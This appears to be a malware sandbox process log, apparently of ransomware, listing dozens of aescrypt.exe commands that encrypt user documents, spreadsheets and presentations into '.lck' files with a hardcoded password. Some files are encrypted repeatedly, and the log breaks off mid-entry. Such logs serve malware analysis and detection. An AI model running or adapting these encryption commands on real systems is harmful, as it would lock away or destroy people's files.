
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck.lck" "ApproveWrite.vsw.lck.lck"
3⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck" "SendRedo.pub"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck" "SendRedo.pub.lck"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck.lck" "SendRedo.pub.lck.lck"
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck" "StepConnect.xlt"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck" "StepConnect.xlt.lck"
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck.lck" "StepConnect.xlt.lck.lck"
3⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck" "EditPop.ppt"
3⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck" "EditPop.ppt.lck"
3⤵
PID:440

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck.lck" "EditPop.ppt.lck.lck"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck" "DisableUnlock.ppsm"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck" "DisableUnlock.ppsm.lck"
3⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck.lck" "DisableUnlock.ppsm.lck.lck"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck" "ReceiveAssert.vstm"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck" "ReceiveAssert.vstm.lck"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck.lck" "ReceiveAssert.vstm.lck.lck"
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck" "ProtectSkip.xls"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck" "ProtectSkip.xls.lck"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck.lck" "ProtectSkip.xls.lck.lck"
3⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck" "ApproveLimit.vsdx"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck" "ApproveLimit.vsdx.lck"
3⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck.lck" "ApproveLimit.vsdx.lck.lck"
3⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck" "UnlockOptimize.htm"
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck" "UnlockOptimize.htm.lck"
3⤵
PID:520

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck.lck" "UnlockOptimize.htm.lck.lck"
3⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck" "SearchInstall.odp"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck" "SearchInstall.odp.lck"
3⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck.lck" "SearchInstall.odp.lck.lck"
3⤵
PID:1192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck" "desktop.ini.lck"
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck.lck.lck" "desktop.ini.lck.lck.lck"
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck" "These.docx"
3⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck" "Are.docx"
3⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck" "Recently.docx"
3⤵
PID:440

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck" "Opened.docx"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck" "Files.docx"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck" "These.docx.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck" "Are.docx.lck"
3⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck" "Recently.docx.lck"
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck" "Files.docx.lck"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck" "Opened.docx.lck"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck.lck" "These.docx.lck.lck"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck.lck" "Are.docx.lck.lck"
3⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck.lck" "Recently.docx.lck.lck"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck.lck" "Files.docx.lck.lck"
3⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck.lck" "Opened.docx.lck.lck"
3⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck.lck.lck" "These.docx.lck.lck.lck"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck.lck.lck" "Recently.docx.lck.lck.lck"
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck.lck.lck" "Are.docx.lck.lck.lck"
3⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck.lck.lck" "Files.docx.lck.lck.lck"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck.lck.lck" "Opened.docx.lck.lck.lck"
3⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck" "SwitchOut.mhtml"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck" "SwitchOut.mhtml.lck"
3⤵
PID:972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck.lck" "SwitchOut.mhtml.lck.lck"
3⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck.lck.lck" "SwitchOut.mhtml.lck.lck.lck"
3⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck" "ShowMount.vsdx"
3⤵
PID:884

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck" "ShowMount.vsdx.lck"
3⤵
PID:232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck.lck" "ShowMount.vsdx.lck.lck"
3⤵
PID:892

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck.lck.lck" "ShowMount.vsdx.lck.lck.lck"
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck" "ExpandInitialize.dotm"
3⤵
PID:912

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck" "ExpandInitialize.dotm.lck"
3⤵
PID:584

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck.lck" "ExpandInitialize.dotm.lck.lck"
3⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck.lck.lck" "ExpandInitialize.dotm.lck.lck.lck"
3⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck" "RequestSave.vsdm"
3⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck" "RequestSave.vsdm.lck"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck.lck" "RequestSave.vsdm.lck.lck"
3⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck.lck.lck" "RequestSave.vsdm.lck.lck.lck"
3⤵
PID:1532

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck" "PublishConnect.vdw"
3⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck" "PublishConnect.vdw.lck"
3⤵
PID:2028

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck.lck" "PublishConnect.vdw.lck.lck"
3⤵
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck.lck.lck" "PublishConnect.vdw.lck.lck.lck"
3⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck" "WatchStart.docm"
3⤵
PID:1940

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck" "WatchStart.docm.lck"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck.lck" "WatchStart.docm.lck.lck"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck.lck.lck" "WatchStart.docm.lck.lck.lck"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck" "InvokeSubmit.doc"
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck" "InvokeSubmit.doc.lck"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck.lck" "InvokeSubmit.doc.lck.lck"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck.lck.lck" "InvokeSubmit.doc.lck.lck.lck"
3⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck" "FindSet.mhtml"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck" "FindSet.mhtml.lck"
3⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck.lck" "FindSet.mhtml.lck.lck"
3⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck.lck.lck" "FindSet.mhtml.lck.lck.lck"
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck" "OptimizeRevoke.pptx"
3⤵
PID:520

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck" "OptimizeRevoke.pptx.lck"
3⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck.lck" "OptimizeRevoke.pptx.lck.lck"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck.lck.lck" "OptimizeRevoke.pptx.lck.lck.lck"
3⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck" "ResolveResize.vsw"
3⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck" "ResolveResize.vsw.lck"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck.lck" "ResolveResize.vsw.lck.lck"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck.lck.lck" "ResolveResize.vsw.lck.lck.lck"
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck" "SaveWatch.vsw"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck" "SaveWatch.vsw.lck"
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck.lck" "SaveWatch.vsw.lck.lck"
3⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
